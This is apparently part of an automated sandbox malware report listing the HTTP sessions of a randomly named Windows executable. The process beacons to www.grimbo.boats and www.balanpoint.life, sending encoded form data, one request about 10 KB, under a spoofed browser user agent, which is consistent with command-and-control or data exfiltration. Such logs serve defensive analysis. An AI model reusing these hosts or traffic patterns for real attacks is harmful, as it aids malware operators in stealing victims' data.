                                                        Data Ascii: "NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-wid
                                                        Dec 11, 2024 04:51:51.962696075 CET869INData Raw: 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a
                                                        Data Ascii: cale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"></head><body><div id="partner"></div><script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'sr


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.449936172.67.182.198805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:51:57.503652096 CET803OUTPOST /mjln/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.grimbo.boats
                                                        Origin: http://www.grimbo.boats
                                                        Cache-Control: max-age=0
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Content-Length: 204
                                                        Referer: http://www.grimbo.boats/mjln/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Data Raw: 67 6e 6c 78 44 78 74 3d 72 54 31 57 54 36 6a 79 67 77 6f 62 79 4f 32 38 4c 36 53 49 59 54 2f 4a 31 35 37 63 55 65 32 4e 30 5a 44 62 4d 4e 42 31 63 76 2b 6c 32 61 74 2f 4e 59 4b 69 7a 46 38 2f 68 43 4c 61 66 4c 2b 67 53 6f 53 36 47 52 35 4a 75 45 70 31 31 64 57 2b 45 62 72 69 6f 52 45 72 7a 51 45 67 72 73 77 53 74 6e 77 6e 4b 52 6e 61 56 36 48 39 58 6d 62 58 6d 4b 67 6a 78 71 72 55 62 4c 4d 63 78 6e 30 6b 47 65 38 5a 58 4f 42 72 76 6a 62 76 76 63 68 77 7a 78 6e 6a 6a 75 2f 55 2f 49 75 6c 75 75 61 76 57 66 64 5a 52 41 75 44 74 55 51 4f 74 51 35 36 6e 4f 69 6f 34 69 66 4c 52 4c 30 4f 68 64 2f 63 6b 51 3d 3d
                                                        Data Ascii: gnlxDxt=rT1WT6jygwobyO28L6SIYT/J157cUe2N0ZDbMNB1cv+l2at/NYKizF8/hCLafL+gSoS6GR5JuEp11dW+EbrioRErzQEgrswStnwnKRnaV6H9XmbXmKgjxqrUbLMcxn0kGe8ZXOBrvjbvvchwzxnjju/U/IuluuavWfdZRAuDtUQOtQ56nOio4ifLRL0Ohd/ckQ==
                                                        Dec 11, 2024 04:51:58.787681103 CET1064INHTTP/1.1 404 Not Found
                                                        Date: Wed, 11 Dec 2024 03:51:58 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n2ZDdT9xQBNKZ6YeB3NBLmZAV4Ok2M99AVA6pozXul20iPi8hizs7e1S%2BmP9%2FMjHezcaqwj%2BbhARk8hu6idLPpLi2DlaJUL1LReeIR%2FzZ5BQEf5ICUhxlFgVVWKTl%2BWxHjOS"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f0284ee2c730fab-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1667&rtt_var=833&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=803&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.449942172.67.182.198805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:52:00.167243004 CET823OUTPOST /mjln/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.grimbo.boats
                                                        Origin: http://www.grimbo.boats
                                                        Cache-Control: max-age=0
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Content-Length: 224
                                                        Referer: http://www.grimbo.boats/mjln/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Data Raw: 67 6e 6c 78 44 78 74 3d 72 54 31 57 54 36 6a 79 67 77 6f 62 7a 75 47 38 4e 64 47 49 65 7a 2f 4b 70 70 37 63 61 2b 33 4b 30 5a 50 62 4d 4d 46 66 62 64 71 6c 32 34 31 2f 58 61 75 69 77 46 38 2f 35 53 4c 66 41 62 2b 72 53 6f 57 59 47 51 46 4a 75 48 56 31 31 63 6d 2b 45 49 44 74 6f 42 45 74 79 67 45 69 31 63 77 53 74 6e 77 6e 4b 51 48 77 56 2b 72 39 4c 46 7a 58 6d 70 34 67 34 4b 72 58 53 72 4d 63 31 6e 30 67 47 65 39 38 58 50 64 42 76 6c 66 76 76 5a 4e 77 7a 6c 54 67 6f 75 2b 52 67 59 76 7a 71 65 2f 2f 59 63 77 76 54 42 44 73 69 30 55 78 6c 32 30 67 32 2f 44 2f 71 69 37 34 4d 4d 39 36 73 65 43 56 2f 57 42 50 75 32 77 73 61 32 6f 73 77 46 41 59 45 5a 37 72 78 67 6b 3d
                                                        Data Ascii: gnlxDxt=rT1WT6jygwobzuG8NdGIez/Kpp7ca+3K0ZPbMMFfbdql241/XauiwF8/5SLfAb+rSoWYGQFJuHV11cm+EIDtoBEtygEi1cwStnwnKQHwV+r9LFzXmp4g4KrXSrMc1n0gGe98XPdBvlfvvZNwzlTgou+RgYvzqe//YcwvTBDsi0Uxl20g2/D/qi74MM96seCV/WBPu2wsa2oswFAYEZ7rxgk=
                                                        Dec 11, 2024 04:52:01.447227955 CET1061INHTTP/1.1 404 Not Found
                                                        Date: Wed, 11 Dec 2024 03:52:01 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lLZCTO1%2FGPsTsbDggEnIgWm026WDrs4jizTyKqBSl6M4GSXs5MYh7jthEvFr6Wo4f2D92IdvoICqZYiL2phRfYPzNwfcUOcOGsGb29hcXfnLRA1lF4Si9Ntaand%2FHu93MA%2BK"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f0284fecaa7422f-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2028&min_rtt=2028&rtt_var=1014&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=823&delivery_rate=0&cwnd=135&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.449948172.67.182.198805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:52:02.823101044 CET10905OUTPOST /mjln/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.grimbo.boats
                                                        Origin: http://www.grimbo.boats
                                                        Cache-Control: max-age=0
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Content-Length: 10304
                                                        Referer: http://www.grimbo.boats/mjln/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Data Raw: 67 6e 6c 78 44 78 74 3d 72 54 31 57 54 36 6a 79 67 77 6f 62 7a 75 47 38 4e 64 47 49 65 7a 2f 4b 70 70 37 63 61 2b 33 4b 30 5a 50 62 4d 4d 46 66 62 64 79 6c 33 4e 70 2f 55 37 75 69 2f 6c 38 2f 6e 43 4c 65 41 62 2b 4d 53 70 79 63 47 51 49 2b 75 42 5a 31 30 2b 75 2b 55 70 44 74 69 42 45 74 33 51 45 6a 72 73 78 51 74 6e 67 6a 4b 52 72 77 56 2b 72 39 4c 44 50 58 68 36 67 67 2b 4b 72 55 62 4c 4e 54 78 6e 30 45 47 66 55 42 58 50 70 37 76 56 2f 76 76 35 64 77 32 57 37 67 72 4f 2b 54 6a 59 76 37 71 65 43 6c 59 64 63 5a 54 42 47 78 69 32 49 78 6c 33 5a 30 75 72 44 68 6f 6a 44 78 58 50 41 59 73 4d 69 70 6d 45 59 79 68 48 73 34 45 53 30 50 2b 6d 78 50 47 73 76 73 7a 55 71 49 36 50 51 2b 63 36 6c 30 6b 77 66 78 6c 6e 45 35 2b 7a 70 62 73 44 4c 68 70 79 42 58 50 57 35 6a 44 30 65 37 7a 72 76 38 73 37 69 38 46 51 58 78 57 75 70 77 54 4a 69 2b 5a 30 67 4d 63 62 54 72 54 71 54 38 50 78 34 6c 39 6e 33 68 35 37 30 51 35 48 68 6e 65 7a 68 6f 66 49 77 49 62 54 65 72 78 46 64 46 4b 34 4b 74 30 6d 48 48 37 77 77 48 67 4e [TRUNCATED]
                                                        Data Ascii: gnlxDxt=rT1WT6jygwobzuG8NdGIez/Kpp7ca+3K0ZPbMMFfbdyl3Np/U7ui/l8/nCLeAb+MSpycGQI+uBZ10+u+UpDtiBEt3QEjrsxQtngjKRrwV+r9LDPXh6gg+KrUbLNTxn0EGfUBXPp7vV/vv5dw2W7grO+TjYv7qeClYdcZTBGxi2Ixl3Z0urDhojDxXPAYsMipmEYyhHs4ES0P+mxPGsvszUqI6PQ+c6l0kwfxlnE5+zpbsDLhpyBXPW5jD0e7zrv8s7i8FQXxWupwTJi+Z0gMcbTrTqT8Px4l9n3h570Q5HhnezhofIwIbTerxFdFK4Kt0mHH7wwHgN5WA5BUPdui6oGQBSYACTesqg/FFOft77b5pif5Jmd1Ul5vPmW8XaKF3AUKMj5h9WX/JdxHy1rZhSsUuy95w8tczBjgGIkyPYTs8ysZWXGqV3GjFQmbg/8MHgn577i3KqkSzd0ntYSL8iV5edMErJMP/I9fjQOSp2/e8wofiYv+25I57PY6kaRyjLxBhoV5JT2BnhCfxtPxAro60izr5eMFT4kw8EeBoonLK4AbFM3pRNZdaXX709kQH5yR13f8qv+dYCHhjtuCdAZjLL+YClwIZQZk9sZ9xNJRgC4qCtTd3fP926XQdFuqEd2Y6+KAu8aEoxFJmMaTyk5GDGOlbuq7jJP3+c7fmM1BYHEkn0aiqZLt87GSw9CLa2gcaZtI8Kgg9kzroMJw/PWwUjc7r658EGY1+SgIpaRKRRG7395sBCQS3/NatzVtNNPd2y6ig2OuYUAdR8FX8O82EHiW6rn7OPY3B4Jvlt/r0KGauzXQmamdotaqkjZeXzAk0CPJUxEG8biyxc8/sOuSx7UHFDxsvtG4cZvP4IxvyPhwn5/bnoJkEMKDNbP7zeEe9mLwBpelzYOzTNipcp3bQpHkHNOPPEibXT9sjA435drPh1nBx/Y343jCwXOkiMBuSbmBnhqhuNpwQZ5OIOV33lmdsDQbU2RIuuFRwKTq [TRUNCATED]
                                                        Dec 11, 2024 04:52:04.121299028 CET1061INHTTP/1.1 404 Not Found
                                                        Date: Wed, 11 Dec 2024 03:52:03 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DvPRlmBgPLEM4X05GOPeXmJB528UUzPlLeXzsHcQO57w%2B3eCLGrmGuCt6iOy3jR8UWrqpVtBCJVtekibX93SMeQAK3RDFPkXRw0m6GoBpBCjSRPdlh6eioCrh6FcvO%2B2CCVg"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f02850f6da41a03-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1889&min_rtt=1889&rtt_var=944&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10905&delivery_rate=0&cwnd=140&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.449954172.67.182.198805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:52:05.473501921 CET538OUTGET /mjln/?gnlxDxt=mRd2QOrZow0Zy8rcEJSXGRznkeTfTdv0yZ2YG4FUDMPe/4koX4+1ymts9nnhEJy5dYKCFioRx0Zy3sftYsziig07/zAt0ecRqm4eM3zYCvLGPFaM+s8J2dY=&Cpbp2=zjh46zEHi HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.grimbo.boats
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Dec 11, 2024 04:52:06.803153992 CET1087INHTTP/1.1 404 Not Found
                                                        Date: Wed, 11 Dec 2024 03:52:06 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OzjY4Tgh6Iiw4Ubvvj%2BFPmFos4pA4IaVciSoI%2Fk2GRhTUc1%2Fa%2FeAw7FM83gPTd5npYeQ7dxHlHleRJ8v5Jna0v%2FaFMtxC69Wob1a6YiW4SkSe2ERVQZx%2FWfYnMFuckHVmx0x"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f02851ffbec7d0c-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1876&min_rtt=1876&rtt_var=938&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=538&delivery_rate=0&cwnd=154&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 31 31 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 115<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>10


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.449975209.74.79.40805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:52:12.701015949 CET812OUTPOST /0cbv/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.balanpoint.life
                                                        Origin: http://www.balanpoint.life
                                                        Cache-Control: max-age=0
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Content-Length: 204
                                                        Referer: http://www.balanpoint.life/0cbv/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Data Raw: 67 6e 6c 78 44 78 74 3d 34 6e 4b 52 68 77 72 6a 6d 2b 5a 6f 36 6c 45 56 41 45 70 42 53 57 46 56 4e 33 33 39 39 2f 64 58 4e 61 62 38 45 70 54 76 4f 62 6e 73 64 41 46 39 6d 34 6d 38 45 4b 49 49 53 50 6f 34 44 55 36 62 69 32 46 42 63 66 37 4e 78 4e 67 52 76 56 35 68 50 68 31 4f 4a 36 62 67 31 44 30 51 41 72 76 44 7a 67 77 50 38 6b 33 50 58 68 58 75 73 2f 33 48 6f 6c 43 69 4b 66 66 56 7a 4b 33 30 31 62 6c 4b 32 73 35 42 74 38 73 49 30 6d 67 55 79 44 55 72 4c 61 6d 58 4d 38 4a 42 58 34 64 4c 70 76 62 39 59 6c 35 62 54 4f 79 62 6b 6d 6a 35 49 55 65 78 62 73 79 38 41 35 59 68 6c 32 64 79 48 72 43 79 52 77 3d 3d
                                                        Data Ascii: gnlxDxt=4nKRhwrjm+Zo6lEVAEpBSWFVN3399/dXNab8EpTvObnsdAF9m4m8EKIISPo4DU6bi2FBcf7NxNgRvV5hPh1OJ6bg1D0QArvDzgwP8k3PXhXus/3HolCiKffVzK301blK2s5Bt8sI0mgUyDUrLamXM8JBX4dLpvb9Yl5bTOybkmj5IUexbsy8A5Yhl2dyHrCyRw==
                                                        Dec 11, 2024 04:52:13.920367002 CET533INHTTP/1.1 404 Not Found
                                                        Date: Wed, 11 Dec 2024 03:52:13 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.449981209.74.79.40805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:52:15.370254040 CET832OUTPOST /0cbv/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.balanpoint.life
                                                        Origin: http://www.balanpoint.life
                                                        Cache-Control: max-age=0
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Content-Length: 224
                                                        Referer: http://www.balanpoint.life/0cbv/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Data Raw: 67 6e 6c 78 44 78 74 3d 34 6e 4b 52 68 77 72 6a 6d 2b 5a 6f 36 46 30 56 42 6a 56 42 44 6d 46 55 52 48 33 39 30 66 64 54 4e 61 66 38 45 72 2b 30 4f 4f 50 73 54 41 56 39 6e 35 6d 38 4a 71 49 49 61 76 6f 48 48 55 36 45 69 32 35 2f 63 61 44 4e 78 4e 30 52 76 51 46 68 50 57 4a 42 4c 71 62 75 30 7a 30 53 4e 4c 76 44 7a 67 77 50 38 6c 57 59 58 68 50 75 76 4c 7a 48 71 45 43 74 44 2f 66 55 30 4b 33 30 6a 72 6c 4f 32 73 34 6b 74 34 4e 76 30 6a 6b 55 79 43 6b 72 4b 4c 6d 59 58 73 4a 50 49 6f 63 4b 70 4e 65 77 56 30 4e 52 5a 4e 4b 39 73 56 62 61 41 79 54 72 4b 64 54 72 53 35 38 53 34 78 55 47 4b 6f 2f 37 4b 7a 51 6e 58 56 47 32 64 61 6f 6a 76 51 75 77 41 31 52 6e 74 61 4d 3d
                                                        Data Ascii: gnlxDxt=4nKRhwrjm+Zo6F0VBjVBDmFURH390fdTNaf8Er+0OOPsTAV9n5m8JqIIavoHHU6Ei25/caDNxN0RvQFhPWJBLqbu0z0SNLvDzgwP8lWYXhPuvLzHqECtD/fU0K30jrlO2s4kt4Nv0jkUyCkrKLmYXsJPIocKpNewV0NRZNK9sVbaAyTrKdTrS58S4xUGKo/7KzQnXVG2daojvQuwA1RntaM=
